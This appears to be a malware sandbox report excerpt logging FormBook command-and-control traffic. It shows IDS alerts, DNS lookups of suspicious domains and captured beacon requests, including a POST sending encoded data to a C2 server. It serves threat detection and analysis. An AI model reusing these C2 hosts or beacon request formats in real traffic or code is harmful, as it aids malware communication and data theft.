                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49841 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49811 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49817 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49847 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49827 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49894 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49790 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49883 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49880 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49928 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49899 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49883 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49905 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49853 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49853 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49823 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49922 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49934 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50004 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50001 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49940 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50003 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50003 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50007 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50007 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50006 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50014 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50017 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50016 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49827 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49874 -> 162.0.213.94:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49786 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50012 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49796 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49796 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50005 -> 92.204.40.98:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49911 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49911 -> 144.76.229.203:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50013 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50002 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50010 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50018 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50011 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50011 -> 104.21.16.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50015 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50015 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:50019 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50019 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.sidang.xyz
                Source: DNS query: www.hastanhizmetleri.xyz
                Source: DNS query: www.noudge.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.vaishnavi.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.gelida.xyz
                Source: Joe Sandbox ViewIP Address: 8.210.49.139 8.210.49.139
                Source: Joe Sandbox ViewIP Address: 144.76.229.203 144.76.229.203
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /cwaj/?1N=k898KziH&3vhxw=NmUfxQrz0WFQu6ex3B+4pm0wutRNdkQrCagHYkSMqQArAACBkiI71BEuNA1edrIRm5QCdE2XawPBlU7vbp4P2eGZM+ObLLuwfcBOqu52BvYuUPALHlcYrQ0Je8wl9skZiVn7occL/PQX HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.isoemarket.shopConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /6wi0/?3vhxw=MUmOKOjVbEpAXFm9wjsh8/qMHN43MS2c6TEVXWaXYAj73tUw1MgyAUdmulGWvnB4v8QQA07PGVxg24rIHlu15xcomf7OQeclW9hY0QeF29uLuZGvMve3WYBZELn2//dDCzjglcOqyXn6&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /0j68/?1N=k898KziH&3vhxw=T5zk9dsLIunu/n4sMlTl5TxbL17m3yvhtRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/GNhVjyhRyZhSJdRQ/J2TIImfi1snZM3UUnEAE7VU3U4pUdkFvMoGOL6w/t1JlER HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.sidang.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /yw3f/?3vhxw=EQSrhtPuDg3pW57/t668kTJUp7qGcAJHL6EaWebBO0TpTRxDo7/bTIB2xez8ddqkXF2LbmtEbkI7kZgVxT7fPzMQDO1n3kUCd1dpbtAqXWVIJELRlQ9s0cN+drvMzU+uHCj+pJSFwLvO&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hastanhizmetleri.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /n00b/?3vhxw=iQ+QS1lo6uvIGGPL/anhhZjVtxmDNRRo2wOeU9EorhnMg6Dg3MakUEzOvHEw8ZD+mNMFq81MdilwNKpwrucL8V4v3FR1ZtxrzHpl5AutDtRsbISiPqNN/qAd5FYgDB3nxCxjLBVHOS/k&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.noudge.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /x35a/?3vhxw=dWY7lI8HDhihY6JPDiu2Y6hLOPsEmINoIrDJkGpZj0gBIjegzPnOseQLWLFbNyUuWYMzRp0ci/LZueoJN+9YnCwPl5N4ruuJ4viUbVqN/fyZ+aJRUNvg59RbxNoTZeh8X7AKxZRS04++&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.031235045.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /2p9f/?1N=k898KziH&3vhxw=kR4sXqxEqdCKxcdw2vMtqb3AM0C84J13h13R7fH3Y7T7Jml87ikCWT0lH6J8YdG1qFj+UvZ1zE/9YSWRQ7SaBHva0aI7MrSJL/DkXnnJZsD8pjOQokCsDCx5QkisekfcYXD88MR0pBon HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.fkrvhaupjtc.infoConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /a255/?3vhxw=71qW4Nx4dt5SfVYZkQHtIjrMqfw8DY/cD1lK2mKt9LCJZ4STjm65LcjSJQ2HTSiE+Z7WdPOkz4Dc0w/KNAm2+hPg4Y2yewEtiUJ7K61oh8ePqJTAajNoHkpH+qg0ClVj3QG6QQvwQIGE&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vintageprod.netConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /lfjm/?3vhxw=SYdBkJci5v39nf4UBCyxxB+PkIPUh5cSvGXaIroc+h3NqMcJAPR48Il0IqREyzliai9XD9lgyxpgfQFl8d4wnuSgvNqmFik7Lfg61ffR8EDqoC7H1nCHxBZZ3B2j2IRwe1DzZrpEXKqI&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.vaishnavi.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /6m32/?3vhxw=Va/we0xl003DQZZ95AFUEv2evIgZUlG+bUy9vd5w4QTsm7kbnVGOKZ/fShoalOeRjCVBwCWzFLQL56uWIkSaj+cOcYHy4w2KfsDzTDQlZgMNN4Mxl2pFsMG9FPNDeGnE0bc2OvtfAJPy&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.rbopisalive.cyouConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /o4w6/?1N=k898KziH&3vhxw=6lKfvrTTzjNBleeoPlg/CC2pMX1objNQ3seX6l6NteG/OnLU2Wkj2ZjnFUXwTNDzYGydJHdrz8GXGpxHCC5uPjGKdUqqSRGcmKjetsGXxK5ZD6rTwPW2bTSlaUBfbIja4NW3aGlv9dim HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dualbitcoin.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficHTTP traffic detected: GET /3xxf/?3vhxw=nI71gAHwA2y1h+HY+qsI8s92/p9MV/yUWZbbeDVE2zDMFU7E/I5Jnbhdlga2X4Rk93x69PX2UbpyE4MrGgdncrw39XWSQ3dD8rBn3U9v867aY8q9vajCMhYhBrTGm54L8Sd9VHnWRVW9&1N=k898KziH HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.gelida.xyzConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global trafficDNS traffic detected: DNS query: time.windows.com
                Source: global trafficDNS traffic detected: DNS query: www.isoemarket.shop
                Source: global trafficDNS traffic detected: DNS query: www.vsilmhxj.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.sidang.xyz
                Source: global trafficDNS traffic detected: DNS query: www.hastanhizmetleri.xyz
                Source: global trafficDNS traffic detected: DNS query: www.noudge.xyz
                Source: global trafficDNS traffic detected: DNS query: www.031235045.xyz
                Source: global trafficDNS traffic detected: DNS query: www.fkrvhaupjtc.info
                Source: global trafficDNS traffic detected: DNS query: www.vintageprod.net
                Source: global trafficDNS traffic detected: DNS query: www.vaishnavi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.gelida.xyz
                Source: unknownHTTP traffic detected: POST /6wi0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.vsilmhxj.tokyoOrigin: http://www.vsilmhxj.tokyoConnection: closeContent-Length: 218Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Referer: http://www.vsilmhxj.tokyo/6wi0/User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25Data Raw: 33 76 68 78 77 3d 42 57 4f 75 4a 37 44 6b 55 57 46 43 57 30 76 2b 6a 51 63 50 6f 63 6a 78 49 75 34 62 41 43 47 30 72 51 51 6c 62 57 32 69 65 6a 50 77 37 4c 6f 43 33 37 6f 4c 44 30 70 6e 30 78 66 31 6a 6d 5a 6d 70 66 74 48 45 67 50 55 54 54 70 6a 32 4a 33 57 47 6c 79 31 76 6d 35 49 6e 64 50 53 55 35 55 41 56 4f 77 34 7a 57 54 30 34 38 75 51 6d 73 2f 6f 4f 5a 75 39 65 4e 4a 73 46 49 54 59 2f 63 41 35 48 77 43 67 36 39 7a 4e 73 57 58 76 6b 79 43 61 76 73 6d 45 67 4c 6b 47 46 77 64 74 76 74 79 38 77 4d 67 35 6d 4a 36 7a 46 5a 5a 35 51 47 48 6c 4e 71 45 53 2b 68 2f 54 58 76 30 70 37 4a 56 72 2b 62 77 75 71 6b 51 58 43 2f 36 2f 37 58 52 5a 4e 67 3d 3d Data Ascii: 3vhxw=BWOuJ7DkUWFCW0v+jQcPocjxIu4bACG0rQQlbW2iejPw7LoC37oLD0pn0xf1jmZmpftHEgPUTTpj2J3WGly1vm5IndPSU5UAVOw4zWT048uQms/oOZu9eNJsFITY/cA5HwCg69zNsWXvkyCavsmEgLkGFwdtvty8wMg5mJ6zFZZ5QGHlNqES+h/TXv0p7JVr+bwuqkQXC/6/7XRZNg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 04:40:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 